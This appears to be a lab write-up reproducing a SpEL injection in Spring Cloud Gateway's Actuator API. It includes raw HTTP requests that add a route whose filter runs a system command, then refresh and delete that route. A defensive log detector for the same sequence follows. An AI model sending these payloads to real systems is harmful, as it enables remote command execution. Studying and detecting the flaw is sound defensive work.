# Spring Cloud Gateway Server Unauthorized Access Vulnerability

## Vulnerability Description

Spring Cloud Gateway is the API gateway of the Spring ecosystem. Versions up to and including 3.1.0 and 3.0.6 contain a SpEL expression injection vulnerability: if an attacker can reach the Actuator API, it can be exploited to execute arbitrary commands on the gateway host.

## Environment Setup

Run the following command to start a web service that uses Spring Cloud Gateway 3.1.0:

```
docker-compose up -d
```

After the service starts, open `http://your-ip:8080` to see the demo page; the gateway proxies this page from the upstream example.com.

![image-20220519211640099](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-25d0a79386a21d4f4b91e9e6ba92c34695e47071%2Fimage-20220519211640099.png?alt=media)

## Vulnerability Reproduction

Exploiting this vulnerability requires multiple steps.

First, send the following packet to add a route whose filter argument contains a malicious SpEL expression:

```
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.0.5:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
```

![image-20220519211737396](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-ba70c07d52eb3a1963cf6d009bbf0e7a0091e2cf%2Fimage-20220519211737396.png?alt=media)

Then, send the following packet to apply the newly added route:

```
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.0.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1

```

![image-20220519212128250](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-8631545b6a4ca982c6a265c80110d82efae84142%2Fimage-20220519212128250.png?alt=media)

This packet will trigger the execution of the SpEL expression:

![image-20220519212220678](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-9d94e51dfc5e14333f4b0fc057e3d2b46c0027e9%2Fimage-20220519212220678.png?alt=media)

Finally, send the following packet to clean up and delete the added route:

```
DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.0.5:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
```

![image-20220519212306237](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-3f590941db7e8f08a4fd36a1e2af22c0577e2c43%2Fimage-20220519212306237.png?alt=media)

Refresh the routes again so the deletion takes effect:

![image-20230130134103788](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-a3b3586d3059fd1b509664d3ae7e3d9ba087721f%2Fimage-20230130134103788.png?alt=media)
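The three-step sequence above (write a route via Actuator, refresh, delete) is what a defender can look for in gateway access logs. The following detector is an added example and not part of the original page: it walks constructed request records (the record format and sample values are assumptions), flags any route written through `/actuator/gateway/routes/<id>` whose filter or predicate args contain a SpEL template (`#{...}`), and escalates when a subsequent refresh applies that route, since the refresh is the step that evaluates the expression.

```python
import json
import re

ROUTE_RE = re.compile(r"^/actuator/gateway/routes/([^/?]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"
SPEL_RE = re.compile(r"#\{.*?\}")  # SpEL template marker the gateway evaluates in route args

def spel_strings(obj):
    # Yield every string nested in a parsed JSON value that contains a SpEL template.
    if isinstance(obj, str):
        if SPEL_RE.search(obj):
            yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from spel_strings(v)

def analyse(requests):
    # Walk request records in order; return a list of (severity, message) alerts.
    alerts, pending = [], {}  # pending: route id -> SpEL strings not yet applied by a refresh
    for req in requests:
        method, path, body = req["method"], req["path"], req.get("body", "")
        m = ROUTE_RE.match(path)
        if m and method in ("POST", "PUT"):
            route_id = m.group(1)
            try:
                doc = json.loads(body) if body else {}
            except json.JSONDecodeError:
                doc = {}  # malformed body: still record the Actuator write, but no SpEL evidence
            found = list(spel_strings(doc.get("filters", []))) + list(spel_strings(doc.get("predicates", [])))
            if found:
                pending[route_id] = found
                alerts.append(("high", f"route '{route_id}' defined with SpEL in args: {found[0][:60]}"))
            else:
                alerts.append(("medium", f"route '{route_id}' written via Actuator"))
        elif path == REFRESH_PATH and method == "POST":
            for route_id in pending:  # refresh is the step that evaluates the stored expression
                alerts.append(("critical", f"refresh applied SpEL route '{route_id}'"))
            pending.clear()
    return alerts

# Constructed sample records mirroring the request sequence above (not real traffic).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/actuator/gateway/routes/hacktest", "body": json.dumps({
        "id": "hacktest", "uri": "http://example.com",
        "filters": [{"name": "AddResponseHeader",
                     "args": {"name": "Result", "value": "#{T(java.lang.Runtime)}"}}]})},
    {"method": "POST", "path": "/actuator/gateway/refresh", "body": ""},
    {"method": "DELETE", "path": "/actuator/gateway/routes/hacktest", "body": ""},
]
```

In practice, any write to the gateway Actuator endpoints from outside the management network is worth alerting on, whether or not SpEL is present, because the endpoints should not be reachable unauthenticated at all.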
